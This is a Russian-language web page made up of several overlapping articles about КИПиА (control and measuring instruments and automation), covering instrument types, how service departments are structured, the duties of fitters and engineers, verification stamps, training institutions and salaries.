40 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Работник кипа кто это

Как расшифровать аббревиатуру КИПиА и чем занимается киповец

Ни одно современное производство не может обойтись без автоматизации многих процессов. Да и в бытовую жизнь она тоже плотно вошла — практически все сложные бытовые приборы позволяют человеку снизить своё участие в обслуживании до минимума. А отопление, горячее и холодное водоснабжение и многое другое и вовсе полностью обслуживаются специалистами по КИПиА. Эта аббревиатура расшифровывается как контрольно-измерительные приборы и автоматика.

Что такое КИПиА

Если при поломке какого-то сложного бытового прибора человек обращается в мастерскую — там разберутся, то на производственных крупных и не очень предприятиях не всё так просто, поскольку оборудование частично или в целом автоматизировано и включает в себя множество различных узлов, осуществляющих производственные процессы. Практически все они относятся к КИПиА.

Обслуживанием любых видов приборов КИПиА, контролирующих технический процесс, механизмов и узлов, осуществляющих регулировку заданных параметров (это регуляторы температуры, манометры, тахометры и другие контролирующие и регулирующие узлы, клапаны, редукторы, тахогенераторы и прочие исполнительные механизмы, обеспечивающие поддержание технологического процесса) занимается киповец, то есть специалист, непосредственно занимающийся ремонтом и настройкой системы, сотрудник соответствующего цеха или отдела КИПиА. Он отвечает за:

  • Метрологический надзор.
  • Ремонт и техническое обслуживание измерительных приборов и исполнительных узлов.
  • Рационализацию АСУ ТП (автоматизированных систем управления технологическими процессами).

В зависимости от измеряемой среды приборы КИП подразделяют на классы. Они бывают следующими:

  • Приборы для измерения температуры (термометры и датчики, фиксирующие именно эту физическую величину).
  • Устройства определения давления (манометры, электроконтактные манометры и другое оборудование, работающее с давлением).
  • Расходомеры (приборы, которые фиксируют и контролируют изменение количества рабочей среды).
  • Газоанализаторы (устройства, следящие и контролирующие параметры газообразных сред).
  • Уровнемеры (выполняют контроль за уровнем жидкостей в ёмкостях).

В свою очередь, классы принято подразделять на подклассы, так как устройства каждой из приведённых групп обладают ещё рядом индивидуальных характеристик. К примеру, манометры могут не только контролировать давление среды, но и исполнять роль регулятора этой среды. Вследствие этого электроконтактные манометры относят к датчикам электрической сигнализации, которые в зависимости от давления через электроконтакты подают сигнал при достижении наименьшего или наибольшего заданного значения.

Помимо этого, манометры могут измерять различные свойства давления: избыточное, относительное давление или его перепады. Исходя из этого, конструкция таких приборов может значительно отличаться друг от друга.

Структура обслуживающих отделов

Структура отделов формируется по нескольким параметрам, которые учитываются при комплектации цехов или отделов. Так, из основных таких факторов можно выделить два, наиболее важных:

  1. Сложность обслуживания оборудования КИПиА.
  2. Количество приборов, числящихся за предприятием.

Исходя из этих данных может организовываться централизованная или децентрализованная структура обслуживающего персонала.

Централизованные подразделения

Централизованная структура подразделений создаётся, как правило, на небольших предприятиях, где немного соответствующего оборудования — датчиков, регуляторов, манометров и других. Подобное формирование позволяет объединить ремонтную и эксплуатационную службы, которыми может руководить начальник или мастер КИПиА. Также в их обязанности могут добавляться и функции главного метролога.

При такой структуре за каждым участком предприятия закрепляется отдельная группа специалистов, которые проводят ремонт и настройку оборудования на закреплённой территории. При необходимости проведения сложных и масштабных работ, любой участок может быть усилен за счёт слесарей КИП из другой группы.

Выгодна подобная организация и тем, что позволяет создавать узконаправленные бригады (электрики, наладчики, ремонтники, монтажники, электронщики и др.), которые производят все пусконаладочные работы, а также монтируют и внедряют новое оборудование. Дальше же обслуживание переходит киповцам закреплённых за цехом или участком.

Децентрализованная система

Подобная структура характерна для крупных предприятий. Здесь идёт разделение на ремонтный и технологический цеха. Причём каждый из них имеет своего руководителя: первый возглавляет метролог, а второй, начальник цеха.

В обязанности ремонтной службы входит проведение плановых и сверхплановых ремонтных, а также предупредительных работ. Технологический же обеспечивает бесперебойную работу в процессе эксплуатации. А вот деньги, при задействовании специалистов-ремонтников, переходят на отдельный счёт из средств, выделенных технологическому цеху. Поэтому доход первых, напрямую зависит от вторых.

В особых ситуациях технологическая служба может усиливаться за счёт ремонтной. Указание по такому усилению может выдавать только метролог службы.

Основные задачи специалистов КИПиА

Какая бы структура ни применялась на предприятии, выполнение основных задач остаётся одинаковой для любой из них. Поэтому специалисты по КИПиА должны:

  • обеспечивать бесперебойную работу всего оборудования, за которое несёт ответственность подразделение;
  • создание условий, при которых можно поддерживать качественную функциональность всех систем;
  • обеспечить запасными частями и резервным фондом, отвечающую за работу оборудования службу;
  • контролировать правильность эксплуатации приборов и механизмов;
  • своевременно инструктировать и обучать персонал;
  • организовывать монтаж, строительство и наладку, а также ввод в эксплуатацию новых проектов.

Обязанности слесарей-киповцев

К специалисту такого уровня предъявляется ряд требований, и общего знания электротехники здесь недостаточно. Слесарь КИПиА должен иметь профильное образование по этой специальности, знать и уметь ремонтировать приборы, выполнять наладку и их обслуживание, уметь расшифровать и читать схемы, а также выполнять ряд других специализированных задач.

Помимо этого, киповец должен знать основы технологии процесса как оператор и уметь пользоваться специальным оборудованием и электроизмерительными приборами.

Рабочее место киповца в зависимости от специфики предприятия может содержать дополнительное оборудование: электрошкафы и стенды, розетки для подключения приборов, измерительные устройства, пульты и некоторые другие специальные устройства.

Специфика работы инженера контрольно-измерительных приборов

В отделе или подразделении КИПиА также должна быть должность инженера контрольно-измерительных приборов. У сотрудника с такой профессией в обязанности входит следующее:

  • Организационные мероприятия по обеспечению бесперебойной работы оборудования.
  • Внедрение автоматизированного оборудования и ответственность за него.
  • Управление подчинённых ему бригад специалистов КИП.
  • Обеспечение метрологическими средствами.
  • Ответственность за техническую документацию и учёт.
  • Планирование на месяц, квартал, год.
  • Оценка и приёмка выполненных работ.
  • Замечания и предписания по недоработкам.
  • Контроль за выполнением поставленных задач.

Поверка и расшифровка клейма

Все киповские приборы, используемые в автоматизации процессов производства, являются важными составляющими всей системы автоматики. Учитывая это, каждый из них обязан соответствовать нормам и стандартам, для этого в обязательном порядке регулярно проходят государственную поверку, т. е. проверку на точность и на соответствие заданным техническим параметрам.

Обслуживающий персонал должен заменить приборы с подходящим к концу сроком поверки на аналогичные с разрешением на использование до окончания процесса госповерки. Приборы, не прошедшие поверку, переводятся из разряда эксплуатируемых в списанные и сдаются в службу, проводящую контроль устройств и их поверку.

Когда поверка пройдена и прибор признан годным для дальнейшей эксплуатации, на него ставится специальное клеймо, которое подтверждает, что это техническое средство соответствует всем установленным требованиям.

Формы и цвет наносимого клейма могут отличаться, но информация, которую оно несёт, должна быть определенной:

  • Квартал, в котором сделана поверка.
  • Год прохождения поверки.
  • Знак Госстандарта.
  • Код службы, проводившей тестирование.
  • Знак сотрудника КИП и А.

Начинающие работать приборы должны иметь клеймо, содержащее все эти сведения, таким образом, можно увидеть, когда необходимо проходить следующую поверку и допустимо ли использовать его в настоящее время.

Для разных приборов время действия клейма может быть разным. Одни (к примеру, манометры) должны поверяться ежегодно, другие (вольтметры, амперметры) раз в два года. Есть приборы, значение которых никак не может повлиять на соблюдение техпроцесса, поэтому их поверка не является обязательной. В остальных же случаях проверять приборы на соответствие нормам требуется по нормативам, а значит, использование их с отсутствующим или просроченным клеймом запрещено. Уточнить сведения о необходимости поверки можно по официальными нормами, которые указываются на сайте соответствующей службы.

Что такое КИПиА: расшифровка аббревиатуры и виды

Одна из основных характеристик измерительных приборов – класс точности (показатель, описывающий допустимую погрешность). Эта величина не статическая, она изменяется в процессе эксплуатации. В результате, с течением времени, погрешность может выйти за пределы допустимых норм.

Это грозит многими неприятностями, начиная от нарушения технологического процесса и заканчивая угрозой возникновения аварийной ситуации. Поэтому приборы, датчики, измерительные механизмы и другое специализированное оборудование должно проходить регулярную поверку в подразделении КИПиА. Расскажем об организации этой службы и ее основных задачах.

Что такое КИПиА?

Под это определение попадает все контрольное оборудование и автоматика, используемая практически в различных производственных сферах и в быту. В качестве примера можно привести счетчики электроэнергии и воды, регуляторы давления в нефтегазовой отрасли, автоматику для котельных и т.д.

Расшифровка аббревиатуры

Аббревиатура этого термина расшифровывается довольно просто – контрольно-измерительные приборы и автоматика. Служба с одноименным названием выполняет следующие задачи и функции:

  • осуществление метрологического надзора;
  • техническое обслуживание, настройка и ремонт измерительного оборудования;
  • внедрение новых систем автоматизации на предприятии, например, АСУ.

В некоторых случаях мастера и наладчики отдела «КИП и А» могут быть привлечены к пусконаладке электрооборудования, если в том есть производственная необходимость.

Виды КИПиА

Классификация измерительного оборудования производится в зависимости от физико-технических характеристик приборов, а также их качественно-количественных показателей. По названию группы несложно определить назначение входящих в нее измерительных устройств:

  • приборы для измерения температуры – термометры (А на рис.2);
  • устройства для определения давления – манометры (В);
  • измерители расхода рабочей среды или других веществ – расходомеры (С);
  • определители состава газовых смесей – газоанализаторы (D);
  • датчики уровня заполнения емкости – уровнемеры (E) и т.д.

Рисунок 2. Различные виды измерительных приборов

Каждая из групп, в свою очередь, делится на несколько подгрупп, по конструктивному исполнению и принципу работы. Например, манометры, среди них есть устройства для измерения избыточного давления, его перепада, или отображающие абсолютную величину. Конструкция этих приборов может быть электроконтактной или механической.

Электроконтактный манометр

Структура отдела КИПиА

Структура подразделений КИПиА формируется с учетом многих факторов, из которых можно выделить два ключевых:

  • количество используемых предприятием измерительных приборов;
  • сложность обслуживания.

Исходя из этих факторов, формируется централизованная структура службы или децентрализованная. Кратко о каждой из них.

Особенности централизованной структуры

Такой способ формирования подразделения подходит для предприятий, у которых в технологических схемах не задействовано много измерительных приборов, датчиков и т.д. Это позволяет объединить эксплуатационное и ремонтное подразделение в одну службу, которой управляет начальник цеха КИП. На небольших предприятиях это руководящее лицо может совмещать должность главного метролога.

Одна из групп специалистов службы закрепляется за определенными производственными зонами для регулярного обслуживания КИП (включая учет приборов и их ремонт), находящихся на территории, указанной в должностной инструкции. При необходимости распоряжением начальника цеха эта группа специалистов может быть усилена другими работниками службы, например, для проведения объемных ремонтных или монтажных работ.

Данная структура позволяет создавать бригады узкой специализации (например, монтажников, электриков, электрослесарей, электромонтеров, электромонтажников, электронщиков и т.д.). Они занимаются ремонтом, наладкой и монтажом сложного оборудования, а также вводом в эксплуатацию новых систем. После окончания пусконаладочных работ техника обслуживается бригадой, курирующей цех, где была произведена установка.

Особенности децентрализованной структуры

Этот способ организации практикуется на крупных предприятиях. Особенность заключается в том, что ремонтное (методическое) подразделение является обособленной службой, тогда, как задачи по эксплуатации возлагаются на технологический цех. У каждого из этих подразделений свое руководство. Специалистов методического подразделения возглавляет главный метролог, а сотрудники отдела эксплуатации находятся в подчинении начальника цеха.

В обязанности методической службы входят все виды плановых, сверхплановых и планово-предупредительных ремонтных работ. Оплата за оказываемые услуги переводится на отдельный расчетный счет, она вычитается из средств, выделенных технологическому цеху КИПиА.

В зависимости от особенностей производства, работа службы эксплуатации организуется с учетом специализации работ, либо по технологическим признакам.

В первом варианте создаются группы специалистов, отвечающих за эксплуатацию определенных видов КИП (сигнализация, автоматизация, средства контроля и т.д.). Во втором — бригады мастеров, ответственных за работу техники определенных технологических потоков.

В децентрализованной структуре методическая служба в финансовом плане полностью зависит от технологического цеха, поскольку с его бюджета идут выплаты за проделанную работу.

Если возникает производственная необходимость, эксплуатационная служба может быть усилена сотрудниками ремонтного подразделения или бригадами, отвечающими за монтаж систем автоматики и контроля. Распоряжение об этом должен выдать главный приборист предприятия (метролог). С большинством штатных пусконаладочных работ служба эксплуатации должна справляться своими силами.

Пример организационной структуры КИПиА

Основные задачи

Вне зависимости от структуры службы КИПиА, в сферу ее основных задач входят:

  • создание условий, при которых будет обеспечена бесперебойная работа всех систем, за которые отвечает подразделение;
  • обеспечение наличия запасных деталей, резервного оборудования для измерительной техники и автоматики;
  • проверка правильной эксплуатации приборов, находящихся в зоне ответственности службы;
  • регулярные инструкции и обучение персонала нормам и правилам эксплуатации средств автоматики и контроля;
  • ввод в эксплуатацию новых профильных проектов.

Обязанности слесаря КИПиА

В соответствии с требованиями профстандарта, слесарь КИПиА должен знать принцип работы контролируемого им оборудования, уметь ремонтировать и обслуживать его. Например, для обслуживания электрооборудования, необходимо получить соответствующее профильное образование, общих знаний основ электротехники будет недостаточно.

В зависимости от специфики обслуживаемого оборудования, на рабочем месте слесаря могут быть следующие приспособления и наборы инструментов: шкаф КИПиА, щиты, установленная на пульты аппаратура, измерительные устройства, розетки для подключения электроприборов и т.д.

Рабочее место специалиста службы КИП

Данная специальность требует, чтобы работник разбирался как в доверенном ему оборудовании, так и общей технологии процесса.

Чем занимается инженер КИПиА?

Данная профессия возлагает следующий круг обязанностей:

  • организационные работы, связанные с обеспечением бесперебойной работы оборудования;
  • ответственность за внедрение автоматизированного оборудования;
  • управление службами КИПиА, в частности, координация бригад специалистов;
  • метрологическое обеспечение;
  • составление технической документации (технологическая карта, графики ТО, поверки, калибровки);

Пример технологической карты

  • долгосрочное планирование (план мероприятий на месяц, квартал, год);
  • прием выполненной работы;
  • составление предписаний, в соответствии с выявленными недоработками и замечаниями;
  • организация контроля над выполнением поставленных задач.

Пример расшифровки клейма поверки

После поверки прибора службой КИПиА на устройство ставится соответствующее обозначение (клеймо), как правило, оно несет в себе определенную информационную составляющую. Приведем пример расшифровки.

Расшифровка клейма поверки

Обозначения:

  • Дата поверки (квартал).
  • Изображение знака Госстандарта.
  • Год шифруется двумя цифрами, в нашем случае 09 – 2009 год.
  • Код, позволяющий определить службу, проводившую тестирование прибора;
  • Знак, присваиваемый сотруднику КИПиА.

Киповец: что это за профессия

Задача наладчика и инженера КИПиА – сделать, так, чтобы все контрольно-измерительные приборы и автоматические системы предприятия работали, как швейцарские часы, и были надежными, как швейцарский банк.

Описание профессии

Разберемся, кто такой киповец и чем он занимается. Фактически это собирательное название профессии, которая объединяет в себе сразу три отдельные специальности, связанные с КИПиА: инженер, слесарь и наладчик контрольно-измерительных приборов и автоматики. Ее представители востребованы на всех предприятиях, где применяются современные технологии, обслуживаемые автоматизированными системами. Они обеспечивают бесперебойную работу оборудования и механизмов любой сложности. Знания, получаемые ними в учебных заведениях, имеют универсальный характер, что позволяет им трудоустроиться в разных отраслях промышленности.

Киповцы могут быть задействованы при запуске нового объекта или обслуживании уже действующего производства. Они налаживают автоматические линии, диспетчерскую связь, системы сигнализации, регулирования и контроля, испытывают и сдают оборудование в эксплуатацию.

Исходя из особенностей и потребностей производства, могут создаваться разные виды подразделений КИП:

  • Централизованное подходит для предприятий, в которых количество измерительной техники и датчиков невелико. В таком случае ремонтная и эксплуатационная службы сведены вместе под единым руководством, а при необходимости создаются узкоспециализированные бригады (электронщики, монтажники и т. д.).
  • Децентрализованная структура свойственна крупным заводам с разветвленным производством. При такой системе ремонт всего оборудования обеспечивает единая методическая служба (обособленная), а за эксплуатацию отвечает технологический цех.

Градацию профессионализма мастеров определяет Единый тарифно-квалификационный справочник (ЕТКС). Согласно выпуску 2 наладчик КИПиА имеет вилку от 4 до 8 разряда, а слесарь – от 2 до 8 разряда, что говорит о более высоком уровне первого.

На каких специальностях лучше учиться

Инженер-киповец – это специалист, получивший высшее образование по одному из таких направлений подготовки:

  • автоматизация технологических процессов и производств;
  • информационно-измерительная техника и технологии;
  • электропривод и автоматика;
  • компьютерные технологии в системах автоматического управления производственными процессами и др.

Слесарь и наладчик контрольно-измерительных приборов и автоматики – это квалифицированные рабочие. Им достаточно иметь диплом среднего специального учебного заведения по одному из профилей:

  • наладчик (или слесарь) КИПиА;
  • автоматические системы управления;
  • мастер КИПиА.

Для поступления в вуз на специальность, связанную с обслуживанием автоматических систем, абитуриент должен сдать на ЕГЭ такие предметы: русский язык, профильная математика, информатика, физика. Зачисление в ссузы производится на основании конкурса аттестатов.

Вузы для обучения

Качественное инженерное образование дают вузы в разных регионах страны:

  • МИРЭА – Российский технологический университет (г. Москва). Студенты получают знания и навыки относительно автоматизации производственных процессов. Основная масса выпускников трудоустраивается по схеме «вуз – базовая кафедра – базовое предприятие», есть возможность получить дополнительное образование.
  • Санкт-Петербургский государственный университет промышленных технологий и дизайна в своем Институте информационных технологий и автоматизации готовит инженеров-киповцев для экономики Северной столицы и региона в очном и заочном формате. У студентов есть возможность пройти стажировку или преддипломную практику за рубежом (в Китае, Польше, Германии, Финляндии).
  • Морской государственный университет им. адмирала Г. И. Невельского (г. Владивосток) предлагает освоить специальность «управление в технических системах». Выпускники могут применить свои знания на предприятиях сферы водных путей сообщения, связи, промышленности. Среди партнеров – университеты из Австралии, КНР, Японии, Кореи и других стран.
  • Санкт-Петербургский горный университет – это мощный вуз с крупнейшей в стране учебно-лабораторной базой. Здесь после окончания средней школы можно получить диплом по профилю «электропривод и автоматика». При подготовке инженеров-киповцев упор делается на специальные и общепрофессиональные предметы, а также на точные науки.
  • Тюменский индустриальный университет готовит инженеров по приборостроению, методам диагностики и контроля качества оборудования нефтегазовой отрасли.

Будущий слесарь или наладчик контрольно-измерительных приборов и автоматики может обучаться, например, в таких ссузах:

  • Межрегиональный центр компетенций – Чебоксарский электромеханический колледж. На мастера-киповца сюда берут после 9 класса. Срок обучения – 3 года и 10 месяцев.
  • Колледж современных технологий им. М. Ф. Панова (г. Москва) готовит слесарей КИПиА, которые могут обслуживать самую разную технику: от оборудования электростанций и котельных до банкоматов.
  • Московский техникум космического приборостроения МГТУ им. Н. Э. Баумана. На специальность «автоматические системы управления» можно поступить после 9 и 11 класса школы.
  • Химкинский техникум космического энергомашиностроения филиала «Ракетно-космическая техника» МАИ готовит кадры для крупных предприятий, таких как НПО «Энергомаш», НПО им. Лавочкина, МКБ «Факел».
  • Казанский нефтехимический колледж им. В. П. Лушникова. Это одно из основных учебных заведений Республики Татарстан по подготовке слесарей для обслуживания разных автоматизированных систем.

После ссуза выпускники сразу получают квалификацию «техник» и 2–3 разряд по ЕТКС. После этого они могут идти работать или подают документы в вуз для того, чтобы стать инженером. Многие техникумы находятся в структуре или в орбите влияния университетов, что позволяет их лучшим ученикам поступать в вузы на льготных условиях.

Обязанности на работе

Функции, выполняемые киповцем, зависят от конкретного места работы. Его обязанности четко регламентирует должностная инструкция, составленная с учетом требования ЕТКС относительно квалификации сотрудника.

К основным задачам инженера относятся:

  • организация работ по обеспечению функционирования оборудования;
  • управление бригадами специалистов и приемка выполненных работ;
  • внедрение автоматизированных систем;
  • метрологическая деятельность;
  • подготовка технической документации;
  • составление предписаний;
  • планирование и контроль.

У наладчиков и слесарей свои функции:

  • диагностика и настройка различных простых измерительных устройств (счетчиков, манометров, вольтметров, амперметров, датчиков давления и т. д.);
  • снятие и анализ показаний приборов;
  • проверка регулируемой аппаратуры;
  • испытание сложных контрольных систем;
  • определение дефектов и их устранение;
  • монтаж оборудования и коммутация проводки;
  • сборка приборов и устройств;
  • заполнение паспортов и аттестатов на них;
  • составление дефектных ведомостей.

В целом же, киповцу нужно обладать хорошими познаниями в технике, а также:

  • уметь читать схемы и чертежи;
  • знать устройство обслуживаемых приборов и особенности их работы;
  • владеть навыками пользования ремонтными инструментами;
  • разбираться в методах наладки измерительных систем разной сложности;
  • иметь познания в материаловедении, электрике и механике;
  • знать правила оформления необходимой документации;
  • владеть языками программирования (при необходимости).

Инженер, слесарь или наладчик контрольно-измерительных приборов и автоматики востребован в энергетике, пищевой, перерабатывающей, металлургической промышленности, жилищно-коммунальном хозяйстве, нефтегазовой сфере, строительстве.

Кому подходит

Киповцу для качественного выполнения своей работы требуется обладать такими личными свойствами:

  • технический склад ума и пространственное воображение;
  • точный глазомер, цветоразличение и отличное зрение;
  • умение распределять внимание и концентрироваться;
  • четкая координация движений;
  • высокий уровень ответственности;
  • аккуратность и последовательность;
  • готовность четко следовать инструкциям.

К плюсам профессии можно отнести неплохую зарплату и возможность дополнительно обучаться, пополняя свой багаж знаний. Минусы – высокий уровень ответственности, постоянное повышенное внимание и риск получения травмы при нарушении техники безопасности.

Сколько получают

Уровень дохода киповца зависит от должности, разряда, предприятия и региона. В среднем по стране инженер получает 40–50 тысяч рублей, наладчик – 40–42 тысячи, а слесарь 35–40 тысяч. В Москве эти цифры можно увеличить на 10–15 процентов, а в отдаленных северных регионах, где трудятся вахтовым методом, компании готовы платить высококвалифицированным специалистам больше 100 тысяч рублей. Работа наладчик КИПиА в Забайкалье и Хакассии может принести кандидату свыше 200 тысяч рублей. Правда, на Севере с приборами придется повозиться, поскольку в условиях пониженных температур они часто дают сбои или искажают показания.

Как построить карьеру

Инженер КИПиА, проявляя свои лучшие качества, может рассчитывать на должность руководителя подразделения или даже метрологической службы предприятия. Наладчики и слесари, зарабатывая стаж и проходя аттестации, повышают свой разряд вплоть до восьмого, что положительно сказывается на оплате труда. Для того чтобы претендовать на руководящие посты, им нужно будет получить высшее образование по специальности.

Перспективы профессии

Специалисты, умеющие обслуживать контрольно-измерительную аппаратуру, будут в ближайшие годы востребованы на рынке труда. Единственное условие – это идти в ногу со временем, постоянно повышая свою квалификацию с учетом внедряемых в промышленности новинок.

Слесарь КИПиА: что это такое, обязанности специалиста

Попадая на современные крупные предприятия, сразу можно заметить большое количество различных датчиков, измерительных приспособлений, регулирующей аппаратуры и прочей автоматической техники. Именно благодаря этим устройствам операторы могут своевременно получать информацию о том, как протекает технологический процесс. Независимо от того, каким производством занимается компания, везде есть автоматическое оборудование, ремонтом которого должен заниматься слесарь КИПиА. Что это такое — прибор для измерения величины требуемого ДСП в производстве мебели или датчики температуры, регулирующие оборудование во время копчения колбас — неважно, главное, чтобы оно работало исправно. Именно этот сотрудник занимается всеми ремонтными и проверочными работами. Особо нуждаются в специалистах такого типа на металлургических и нефтеперерабатывающих заводах, а также в отрасли химической обработки.

Общие сведения

От налаженности действия контрольно-измерительных приборов и автоматической техники на производстве зависит очень многое, в том числе своевременность выпуска товаров, безопасность труда и отсутствие аварийных ситуаций. Многих интересует: что это такое — слесарь КИПиА? Это сотрудник, следящий за исправностью подобной техники на предприятии.

Слесарь КИПиА — что это такое: тип и класс профессии

Эта профессия напрямую связана с техникой и знаками, поскольку требует от специалиста умения обслуживать и использовать оборудование, а также расшифровывать различные схемы и чертежи. Что касается класса профессии, то это исполнительская должность, предполагающая соблюдение алгоритмов и правил технической эксплуатации оборудования, приборов и прочего инструментария.

Деятельность

Что это такое — слесарь КИПиА? Это ремонтник контрольно-измерительных приборов и автоматики, он является универсальным специалистом, занятым ремонтом, обслуживанием и эксплуатацией систем и устройств. Среди основных задач этого сотрудника стоит выделить проведение ремонтных и проверочных работ, аттестации приборов и обеспечения бесперебойной работы всей техники, что устанавливается в щитах, схемах и пультах. В качестве рабочего места для данного специалиста выделяется стол с источниками тока, а также к нему относятся пульты и щиты с установленным на них оборудованием.

Обязанности сотрудника

Сотрудники, получившие эту должность, обязаны осуществлять контроль над доверенным им оборудованием. Также они испытывают устройства после проведения ремонтных работ на качество и эффективность возможности их эксплуатации. Работники должны своевременно выявлять дефекты работы аппаратуры и устранять их.

Знания сотрудника

Самое первое, что требуется от претендента на должность, это знания химии, физики, математики, основ черчения и металловедения. Помимо этого, сотрудник обязан знать, как устроено, для чего предназначено и по какому принципу работает оборудование, доверенное ему для проведения ремонта. Он должен уметь читать схемы установок регулирования, причем в зависимости от разряда сотрудника, сложность этих схем и чертежей может меняться.

Умения

Сотрудники этой профессии должны понимать чертежи, находящиеся в технических паспортах устройств, с которыми им нужно сталкиваться в ходе выполнения своих обязанностей. Они должны разбираться во всех производственных процессах, где задействована доверенная им аппаратура. Заниматься слесарной работой и собирать, подгонять, термически обрабатывать и доводить детали.

Важные качества

Чтобы успешно выполнять свои обязанности, сотрудник должен быть психически устойчив, нервно уравновешен, поскольку его работа предполагает повышенную ответственность и небезопасные условия. Работник должен быть ответственен, физически вынослив, иметь аналитическое и техническое мышление, хорошее пространственное воображение. Также является очень важным качеством для слесаря КИПиА обучение концентрации и правильному распределению внимания, ему потребуется хорошая память, координация движений и умение различать ритм и тон разных звуков.

Условия труда

Свои должностные обязанности работники этой профессии могут выполнять как в помещениях компании, так и на открытом пространстве, имеется в виду монтаж оборудования за пределами стен здания. Слесарь может сам выполнять полученные задания или работать в коллективе, если ремонтом занимается целая бригада сотрудников организации. Если задания не коллективные, то работник сам занимается распределением и планированием рабочего графика.

Заключение

Что это такое — слесарь КИПиА, и какие обязанности выполняет этот сотрудник, рассмотрено выше в общих чертах. Более подробную информацию о том, что требуется от сотрудника, можно получить на самом предприятии, узнать при изучении должностных инструкций и прочей руководящей методической информации. Стоит учитывать, что все зависит от направления деятельности компании, ее масштабов, количества слесарей и личных потребностей высшего руководства.

КИПиА — расшифровка аббревиатуры и основы профессии киповца

Работа любого современного предприятия, ведущего производственную деятельность, невозможна без использования определённых приборов и датчиков, обобщённо называемых КИПиА. Нужны они и рядовым гражданам, к примеру, для осуществления контроля потребления воды, тепла и электроэнергии. А обслуживанием этих устройств занимаются специально обученные люди.

КИП и КИПиА — расшифровка и различия

Основное предназначение КИПиА, состоящих из специальных измерительных устройств и автоматики, — определение точных физических величин. Устройства позволяют видеть текущий расход воды, определять эффективность конкретного оборудования.

Расшифровка аббревиатуры КИП: контрольно-измерительные приборы. Они замеряют определённые параметры продукции, технологический процесс либо какие-то условия.

Что касается КИПиА, расшифровка аббревиатуры аналогичная, только дополнена словом «Автоматика».

Автоматизация производства привела к созданию нового в КИП. Особенно это коснулось автоматических производств, а не автоматизированных. Отличие этих двух терминов состоит в том, что последнее осуществляется с участием человека, а автоматическое — без него. Заводы по выпуску автомобилей оборудованы целыми конвейерными линиями, где вся сборка выполняется роботами. Есть заводы, оснащённые полностью автоматическими участками, линиями, цехами — и это уже не редкость.

Более того, некоторые группы товаров невозможно изготовить другим способом. К примеру, производство интегральных схем сопряжено со всецело автоматическим процессом, так как человек не способен чем-то помочь в этом вопросе — производимый товар невозможно увидеть без микроскопа.

Задача человека в этой схеме — периодически замерять определённые параметры, поэтому к аббревиатуре КИП добавилась одна буква «А» не считая соединительного союза «и».

Заводы фирм, специализирующихся на производстве высокотехнологического оборудования, укомплектованы службами «КИП автоматика», которые занимаются обеспечением бесперебойной работы всех приборов. Ведь малейший сбой в работе службы чреват остановкой всего производства и последующими огромными убытками.

Классификация контрольно-измерительных приборов

В основном оборудование КИПиА классифицируется по физико-техническим характеристикам и качественно-количественным показателям. Названия групп указывают на назначение относящихся к ним измерительных приборов:

  1. С помощью термометров можно измерить температуру. Они бывают: жидкостными, цифровыми, с преобразованием сопротивления, термоэлектрическими. К этой группе также относятся пирометры и тепловизоры.
  2. Манометры отвечают за определение давления: его избыточности, перепада или абсолютной величины. Они могут быть механическими или электроконтактными.
  3. Измерить расход рабочей среды или прочих веществ помогут расходомеры. В этой группе сосредоточены различные устройства, каждое из которых ориентировано на контроль и изменение конкретного материала (среды).
  4. Основной функцией газоанализаторов является определение состава газовых смесей.
  5. При помощи уровнемеров выявляют уровень заполнения ёмкостей.

Устройства придуманы, чтобы замерять определённые физические свойства. По этим признакам их классифицируют следующим образом:

  1. Физические свойства (температуру и пламя) контролируют термометрами, термопарами, термодатчиками и контролем пламени.
  2. Жидкую и газообразную среду (давление, уровень жидкости и его расход) измеряют манометрами, напорометрами, уровнемерами, расходомерами.
  3. Показатели электричества определяют при помощи вольтметров, амперметров, счётчиков, трансформаторных вольтметров, мостов, магазинов, омметров и высокочастотных измерителей.
  4. Анализаторы и газоанализаторы являются химическими измерителями.
  5. Уровень радиации контролируют с помощью счётчиков Гейгера, дозиметров и детекторов.
  6. При контроле устройств исполнительной автоматики не обойтись без электрозапальников, манипуляторов и серводвигателей.

Средства измерения в бытовой технике

При изучении схемы любого аппарата, использующегося в домашнем быту (от стиральной машины до утюга), можно заметить, что все они оборудованы приборами, измеряющими и контролирующими определённые параметры:

  • горячую воду — их можно обнаружить на котлах или радиаторах;
  • воздух — актуально для кондиционеров и конвекторов;
  • электричество (напряжение и силу тока) — подобные устанавливаются на утюгах, мультиварках, масляных отопительных радиаторах и пр.

Основой современных автоматизированных систем являются микроконтроллерные схемы. Они в процессе развития технологий сменили управляющие блоки, оборудованные схемами с малой интеграцией.

Благодаря этому сегодня можно добиться автоматизации любого процесса, любой установки и даже самого маленького по размерам прибора.

Обслуживающий персонал

За правильной работой любой из автоматизированных систем должен следить человек определённой профессии, а именно: слесарь КИПиА. Он ремонтирует, настраивает приборы и узлы, задействованные в системе, а также осуществляет их техническое обслуживание. В должностных инструкциях подробно описано, кто такой киповец и чем он занимается. В функции специалиста входит обслуживание не только самих приборов контроля, но и других вспомогательных составляющих системы: клапанов, тахогенераторов, редукторов, цилиндров.

Только киповцев для работы недостаточно, за обслуживание и контроль приборов отвечает целый отдел, размещаемый в отдельном помещении, в функции которого входит:

  • правильная организация рабочего процесса;
  • заказ запасных частей;
  • разработка проектов;
  • планирование и составление графиков и др.

В структуру отдела входят и руководящие специалисты: так, у мастера цеха, который подотчётен начальнику цеха, находятся в подчинении слесарь КИПиА. Всё подразделение автоматики находится в управлении главного метролога и его заместителя.

Цех имеет в своей структуре метрологическую лабораторию с киповцами-электронщиками, электриками, операторами, наладчиками и другими узконаправленными специалистами. Они занимаются ремонтом, проверкой и поверкой приборов и средств измерения.

Ключевое место в этой структуре принадлежит инженеру КИПиА, который обязан:

  1. Проектировать и использовать АСУ (автоматизированные системы управления).
  2. Собирать и обрабатывать информацию, необходимую для составления проектов.
  3. Определять задачи для всех подразделений цеха и пояснять необходимые детали согласно должностным инструкциям.
  4. Создавать все программы, определяющие работу АСУ в соответствии с необходимыми требованиями.
  5. Составлять необходимую документацию: методички, инструкции и пр.

Обязанности слесаря-киповца

Слесарь КИПиА осуществляет непосредственное взаимодействие с оборудованием и измерительными приборами. Перечень его обязанностей зависит от квалификации и разряда. К примеру, киповец 6 категории обладает знаниями и навыками, позволяющими обслуживать даже космические аппараты.

Слесарь любой квалификации на производстве делает ряд работ, а именно:

  • ремонтирует, налаживает и испытывает аппаратуру;
  • контролирует и обеспечивает работоспособность электроизмерительных приборов;
  • контролирует и проверяет функционирование средств измерения физических величин;
  • производит арбитражные измерения;
  • контролирует и своевременно ремонтирует всю систему;
  • определяет работоспособность и износ;
  • обрабатывает полученные сигналы и измерения.

